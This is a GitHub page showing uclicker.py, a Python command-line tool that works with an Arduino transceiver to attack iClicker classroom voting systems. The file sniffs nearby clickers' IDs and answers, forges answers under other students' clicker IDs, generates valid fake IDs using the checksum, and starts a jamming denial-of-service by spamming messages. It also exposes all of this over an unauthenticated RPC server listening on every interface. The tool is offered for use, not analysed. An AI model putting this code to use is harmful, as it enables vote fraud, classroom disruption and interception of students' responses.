-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathuclicker.py
401 lines (353 loc) · 11.5 KB
/
uclicker.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
from time import sleep
import serial
import threading
import sys
import argparse
import random
import zerorpc
import struct
import readline
import subprocess
class DummySerial():
'''
A mock serial port for testing command line
without a transceiver
'''
def write(self, x):
'''
Prints data written to serial (for debugging)
'''
print(x)
class Question():
'''
Holds all captured information
for a single iClicker question
'''
def __init__(self):
# set up map from iclicker_id -> current_answer
self.map_id_answer = {}
# maps from answer string to current total
self.map_answer_total = {
'A': 0,
'B': 0,
'C': 0,
'D': 0,
'E': 0
}
# queue which stores most recent iclicker ids
self.sender_list = []
def register_sender(self, sender):
'''
Takes in an iclicker_id and moves it to top of sender list
to maintain most recently active iclickers
'''
(iclicker_id, ans) = sender
# try to remove if present
for iclicker in self.sender_list:
if iclicker[0] == iclicker_id:
self.sender_list.remove(iclicker)
break
# add iclicker id to top of list
self.sender_list.append((iclicker_id, ans))
def save_message(self, iclicker_message):
'''
Processes an incoming iClicker message
if it exists.
'''
if iclicker_message is not None:
answer, iclicker_id = iclicker_message
# ignore P which is an ack for switching freqs
if answer == 'P':
return
# remove previous answer
if iclicker_id in self.map_id_answer:
prev_answer = self.map_id_answer[iclicker_id]
self.map_answer_total[prev_answer] -= 1
# add to total of current answer
self.map_answer_total[answer] += 1
self.map_id_answer[iclicker_id] = answer
# add the iclicker to top of sender list
self.register_sender((iclicker_id, answer))
def get_ids(self, limit=None):
'''
if limit is not provided the function will return all available ids
Returns <limit> number of ids ordered by most recent submission
'''
length = len(self.sender_list)
if limit is None:
limit = length
return self.sender_list[length - limit:length]
def ans(self):
'''
Prints a summary of iClicker answers
collected so far.
'''
for k in sorted(self.map_answer_total):
print(k, self.map_answer_total[k])
class Session():
'''
Runs a uClicker session
with interactive prompt
'''
ERR = 'Invalid command'
def __init__(self, port):
'''
Initializes the session and
connects to the transceiver if port is given.
'''
# Information captured for each iClicker question
self.questions = [Question()]
# Recently captured keyboard input
self.next_cmd = None
# Recently captured iClicker message
self.next_msg = None
# Mutex for questions data
self.questions_mutex = threading.Lock()
# History of commands
self.history = []
# Establish connection to Arduino transceiver
if port is None:
print('No port given, running in test mode')
self.ser = DummySerial()
else:
self.ser = serial.Serial(port, 115200)
threading.Thread(target=self.iclicker_listener,
daemon=True).start()
# Start listening to keyboard
threading.Thread(target=self.keyboard_listener, daemon=True).start()
def loop(self):
'''
Main loop
'''
while True:
self.check_keyboard()
self.check_iclicker()
sleep(.01)
def check_iclicker(self):
'''
Checks for an incoming iClicker message
and passes it to the current Question
'''
if self.next_msg is not None:
iclicker_message = self.next_msg
self.questions_mutex.acquire()
self.questions[-1].save_message(iclicker_message)
self.questions_mutex.release()
# Restart iClicker listener
self.next_msg = None
threading.Thread(target=self.iclicker_listener,
daemon=True).start()
def check_keyboard(self):
'''
Processes keyboard input
if any has been captured.
'''
if self.next_cmd is not None:
self.execute_cmd(self.next_cmd)
# Restart keyboard listener
self.next_cmd = None
threading.Thread(target=self.keyboard_listener,
daemon=True).start()
def execute_cmd(self, cmdstring):
'''
Parses commands from interactive prompt
and calls the corresponding function.
'''
tokens = cmdstring.split()
if tokens[0] == 'quit' or tokens[0] == 'exit':
sys.exit(0)
elif tokens[0] == 'reset':
self.reset()
elif tokens[0] == 'ans':
self.ans()
elif tokens[0] == 'ids':
if len(tokens) >= 2:
if tokens[1].isdigit():
self.ids(int(tokens[1]))
else:
print(self.ERR)
else:
self.ids()
elif tokens[0] == 'freq':
if len(tokens) >= 2 and self.validate_freq(tokens[1].upper()):
self.freq(tokens[1].upper())
else:
print(self.ERR)
elif tokens[0] == 'send':
if len(tokens) >= 3 and self.validate_send(tokens[1], tokens[2].upper()):
self.send(tokens[1], tokens[2].upper())
else:
print(self.ERR)
elif tokens[0] == 'startdos':
self.startdos()
elif tokens[0] == 'stopdos':
self.stopdos()
elif tokens[0] == 'gen':
print(self.generate_id())
else:
print(self.ERR)
def freq(self, freqchoice):
'''
Changes the iClicker frequency to attack on.
:param freqchoice: choice of frequencies in 2 capital letters [A-D]
:return:
'''
# action code
send_str = b''
send_str += struct.pack('>B', 98)
for x in range(2):
send_str += struct.pack('>B', ord(freqchoice[x]))
for x in range(5):
send_str += struct.pack('>B', 97)
self.ser.write(send_str)
def startdos(self):
'''
Starts a DOS attack by spamming iClicker messages.
'''
# Send custom opcode for DOS to Arduino
self.ser.write('cccccccc'.encode())
def stopdos(self):
'''
Halts a DOS attack started earlier.
'''
# Send custom opcode for DOS stop to Arduino
self.ser.write('dddddddd'.encode())
def send(self, iclicker_id, choice):
'''
Send choice to base using alias iclicker_id.
:param iclicker_id: 8 digit hex string
:param choice: letter of choice [A, E] USE CAPITALS!!!
:return: nothing
'''
send_str = b''
# action code
send_str += struct.pack('>B', 97)
# self.ser.write(chr(97).encode())
# iclicker id
for x in range(4):
fragment = iclicker_id[(2*x):(2*(x+1))]
char_representation = struct.pack('>B', int(fragment, 16))
send_str += char_representation
num_choice = ord(choice) - 65
# answer choice
send_str += struct.pack('>B', num_choice)
# fill in the rest of the bytes for 8 byte format
for x in range(2):
send_str += struct.pack('>B', 97)
self.ser.write(send_str)
def reset(self):
'''
Move on to a new Question
'''
self.questions_mutex.acquire()
self.questions.append(Question())
self.questions_mutex.release()
def ans(self):
'''
Prints the captured answers for the current question
'''
self.questions_mutex.acquire()
self.questions[-1].ans()
self.questions_mutex.release()
def ids(self, limit=None):
'''
Prints the captured iClicker IDs for the current question
'''
self.questions_mutex.acquire()
ids = self.questions[-1].get_ids(limit)
self.questions_mutex.release()
for id in ids:
print(id)
def keyboard_listener(self):
'''
Waits for keyboard input.
Should be in its own thread.
'''
try:
self.next_cmd = input('(uclicker)> ')
except EOFError:
print()
self.next_cmd = 'quit'
def iclicker_listener(self):
'''
Waits for iClicker messages.
Should be in its own thread.
'''
while self.next_msg is None:
self.next_msg = self.parse_message(self.ser.readline())
@staticmethod
def parse_message(serial_msg):
'''
Takes in serial input from arduino
Returns: (<answer>, <iclicker_id>) or None if bad message
'''
string_msg = serial_msg.decode('utf-8').strip()
if string_msg != '':
# parse out the string message
try:
answer, iclicker_id = string_msg.split(':')
return (answer, iclicker_id)
except:
return None
return None
@staticmethod
def generate_id():
'''
Generates a random iClicker ID.
iClicker IDs are 4 bytes in hexadecimal,
where the last byte is an XOR checksum of the first three.
'''
def x(i):
return (hex(i)[2:]).upper().zfill(2)
b1 = random.randint(0, 255)
b2 = random.randint(0, 255)
b3 = random.randint(0, 255)
b4 = b1 ^ b2 ^ b3
return ' '.join([x(i) for i in [b1, b2, b3, b4]])
@staticmethod
def validate_freq(f):
'''
Validates that a given frequency
is 2 letters of [A-D]
'''
if len(f) != 2:
return False
if f[0] < 'A' or f[0] > 'D':
return False
if f[1] < 'A' or f[1] > 'D':
return False
return True
@staticmethod
def validate_send(id, choice):
'''
Valides the arguments for send
'''
if len(choice) != 1 or choice < 'A' or choice > 'E':
return False
if len(id) != 8:
return False
id_bytes = []
try:
for i in range(0, 8, 2):
b = int(id[i:i+2], 16)
id_bytes.append(b)
except ValueError:
return False
# Check that the last byte is an XOR checksum of the first 3
if id_bytes[3] != (id_bytes[0] ^ id_bytes[1] ^ id_bytes[2]):
return False
return True
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('-p', '--port')
parser.add_argument('--ui', action='store_true')
args = parser.parse_args()
session = Session(args.port)
if args.ui:
# If using the GUI, launch an RPC server for the Electron code to call
server = zerorpc.Server(session)
server.bind('tcp://0.0.0.0:4545')
server.run()
else:
# If using command line, launch the main listening loop
session.loop()